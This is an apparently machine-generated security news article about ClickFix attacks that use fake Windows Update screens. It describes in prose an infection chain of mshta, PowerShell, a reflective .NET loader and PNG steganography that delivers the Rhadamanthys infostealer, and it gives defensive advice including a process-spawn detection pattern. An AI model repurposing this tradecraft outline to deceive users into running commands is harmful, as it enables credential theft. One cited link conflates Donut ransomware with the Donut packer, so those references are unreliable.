Ethical Hacking News
A new wave of ClickFix attacks has emerged, using fake Windows updates to trick users into running malicious commands on their own machines. The attackers are using steganography to deliver infostealing malware, including Rhadamanthys. To defend against these attacks, organizations should block the Windows Run box and train employees on how the ClickFix technique works, as well as implement endpoint detection and response tools.
ClickFix attacks use fake Windows updates as a lure for unsuspecting victims. The attackers use steganography to encode malicious code into PNG images. The latest attack wave targets users who visit malicious websites displaying a blue Windows Update screen. The malware deployed is Rhadamanthys infostealing malware that steals login credentials. Organizations can defend against ClickFix attacks by blocking the Windows Run box and using endpoint detection tools.
ClickFix attacks have long been a thorn in the side of cybersecurity professionals, using social engineering tactics to trick users into running malicious commands on their own machines. In recent months, these attacks have evolved to use fake Windows updates as a lure for unsuspecting victims. This latest wave of ClickFix attacks uses convincing phishing screens that mimic real Windows updates, with the goal of stealing login credentials from those who fall prey.
According to Huntress security analysts Ben Folland and Anna Pham, the recent attacks are moving away from traditional robot-check lures and instead using fake Windows update screens as a lure. The attackers use a technique called steganography to encode malicious code into PNG images, which are then used to deliver infostealing malware such as Rhadamanthys.
The latest attack wave targets users who visit malicious websites that cause their browsers to enter full-screen mode and display a blue Windows Update screen, similar to the one shared on social media. The scam tells victims to install a "critical security update" via the typical ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command. Running the command kicks off a multi-stage execution chain that begins with an mshta.exe command containing a URL with an IP address, where the second octet is always hex-encoded.
The URL runs PowerShell code that contains a .NET assembly, which is dynamically decrypted and reflectively loaded. And that leads to the deployment of another .NET payload – a steganographic loader that extracts Donut-packed shellcode hidden inside the pixel data of PNG images.
In both cases, the malicious code results in Rhadamanthys infostealing malware being deployed on the victims' machines, swiping their login credentials.
Organizations can defend against ClickFix attacks by blocking the Windows Run box and training employees on how the ClickFix technique works – real CAPTCHA or Windows Update will never require a user to paste and run commands. Additionally, use endpoint detection and response tools to monitor for explorer.exe-spawning mshta.exe, powershell.exe, or other binaries with unexpected command lines.
The Huntress researchers also noted that the source code of the Windows Update lure site contains comments in Russian, which could indicate that the attackers are affiliated with a group operating out of Russia. The fact that multiple active domains continue to host the Windows Update Lure page associated with the Rhadamanthys campaign despite Operation Endgame law enforcement takedowns announced November 13 is an indication that this threat remains active.
In light of these attacks, it is essential for organizations to strengthen their defenses against ClickFix and other types of phishing attacks. Employing a combination of security awareness training, endpoint protection tools, and robust network monitoring can significantly reduce the risk of falling prey to such attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Wave-of-ClickFix-Attacks-Swings-at-Windows-Update-Screens-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2025/11/24/clickfix_attack_infostealers_images/
https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
https://cybersecuritynews.com/clickfix-attack-fake-os-update/
https://www.bitdefender.com/en-us/blog/hotforsecurity/operation-endgame-disrupts-rhadamanthys-information-stealing-malware
https://www.proofpoint.com/us/blog/threat-insight/operation-endgame-quakes-rhadamanthys
https://www.pcrisk.com/removal-guides/12894-donut-ransomware
https://unit42.paloaltonetworks.com/donut-malware-analysis-tutorial/
Published: Mon Nov 24 17:09:15 2025 by llama3.2 3B Q4_K_M
